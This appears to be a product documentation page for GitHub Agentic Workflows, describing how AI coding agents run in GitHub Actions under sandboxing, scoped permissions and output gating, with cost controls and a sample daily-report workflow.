GitHub Agentic Workflows
Wake up to ready-to-review repository improvements-automated triage, CI insights, docs updates, and test enhancements from simple markdown workflows.
GitHub Agentic Workflows deliver this: repository automation, running the coding agents you know and love, in GitHub Actions, with strong guardrails and security-first design principles.
Use GitHub Copilot, Claude by Anthropic, Gemini from Google or OpenAI Codex for event-triggered and scheduled jobs to improve your repository. GitHub Agentic Workflows augment your existing, deterministic CI/CD with Continuous AI capabilities.
Developed by GitHub and Microsoft, workflows run with added guardrails, using safe outputs and sandboxed execution to help keep your repository safe.
ⓘ Note: GitHub Agentic Workflows is in early development and may change significantly. Using agentic workflows requires careful attention to security considerations and careful human supervision, and even then things can still go wrong. Use it with caution, and at your own risk.
Key Features
Section titled “Key Features”Simple Markdown Files
Write automation in plain markdown instead of complex YAML
AI-Powered Decision Making
Workflows that understand context and adapt to situations
Multiple AI Engines
Support for Copilot, Claude, Codex, and custom AI processors
GitHub Integration
Deep integration with Actions, Issues, PRs, Discussions, and repository management
Safety First
Sandboxed execution with minimal permissions and safe output processing
Cost Controls
Per-run AI credit budgets, spend visibility, and OpenTelemetry cost analysis
Guardrails Built-In
Section titled “Guardrails Built-In”AI agents can be manipulated by prompt injection, malicious repository content, or compromised tools. GitHub Agentic Workflows uses layered controls to keep each run contained: sandboxing limits where code can execute, scoped permissions limit what it can request, and gated outputs ensure only approved actions reach GitHub.
flowchart LR
INPUT["Repository + Prompt Input"] --> TOKENS["Read-only Token"]
TOKENS --> SECRETS["No Secrets in Agent"]
SECRETS --> SANDBOX["Sandbox + Network Firewall"]
SANDBOX --> SAFE["Safe Outputs Gate"]
SAFE --> DETECT["Threat Detection Scan"]
DETECT --> APPLY["Scoped Write Job"]
Read-only token
The agent can read repository state, but it cannot push commits or write to issues directly.
No secrets in agent runtime
Sensitive credentials stay in isolated downstream jobs, not inside the agent process.
Sandbox + network firewall
The agent runs in a container behind the Agent Workflow Firewall and can only reach allowed destinations.
Safe outputs gate
Requested actions are validated against your configured safe outputs policy before anything is applied.
Threat detection
A dedicated threat detection job scans proposed outputs and blocks suspicious changes.
Compile-time validation
Schema validation, expression allowlisting, action pinning, and security scanners reject misconfigurations before deployment.
See the Security Architecture for a full breakdown of the layered defense-in-depth model.
Manage Cost and Capacity
Section titled “Manage Cost and Capacity”Cost control starts with visibility. Use gh aw logs and gh aw audit to find runs consuming the most time, tokens, and AI Credits (AIC), then tighten prompts, triggers, and model choices before spend drifts upward.
max-ai-credits gives each run a hard budget, while OpenTelemetry exports traces and token data to OTLP backends for dashboards, alerting, and cost analysis. For optimization over time, compare cost with outcomes so lower spend still produces useful accepted results.
Cost Management
Track Actions minutes, inference spend, and the heaviest runs before deciding what to optimize
OpenTelemetry
Export workflow traces to OTLP backends for dashboards, alerts, and spend analysis
AI Credits Budgets
Cap runaway runs with max-ai-credits and optimize around AI Credits usage
Example: Daily Issues Report
Section titled “Example: Daily Issues Report”Here's a simple workflow that runs daily to create an upbeat status report:
---on: schedule: daily
permissions: contents: read issues: read pull-requests: read
safe-outputs: create-issue: title-prefix: "[team-status] " labels: [report, daily-status] close-older-issues: true---
## Daily Issues Report
Create an upbeat daily status report for the team as a GitHub issue.
## What to include
- Recent repository activity (issues, PRs, discussions, releases, code changes)- Progress tracking, goal reminders and highlights- Project status and recommendations- Actionable next steps for maintainersThe gh aw cli hardens this to a traditional GitHub Actions Workflow (.lock.yml) that runs an AI coding agent (Copilot CLI, Claude Code, Codex, ...) in a containerized environment on a schedule or manually. The AI coding agent reads your repository context, analyzes issues, generates visualizations, and creates reports. All defined in natural language rather than complex code.
Gallery
Section titled “Gallery”Issue & PR Management
Automated triage, labeling, and project coordination
Continuous Documentation
Continuous documentation maintenance and consistency
Continuous Improvement
Daily code simplification, refactoring, and style improvements
Metrics & Analytics
Daily reports, trend analysis, and workflow health monitoring
Quality & Testing
CI failure diagnosis, test improvements, and quality checks
Multi-Repository
Feature sync and cross-repo tracking workflows
Getting Started
Section titled “Getting Started”Install the extension, add a sample workflow, and trigger your first run - all from the command line in minutes.
Creating Workflows
Section titled “Creating Workflows”Create custom agentic workflows directly from the GitHub web interface using natural language.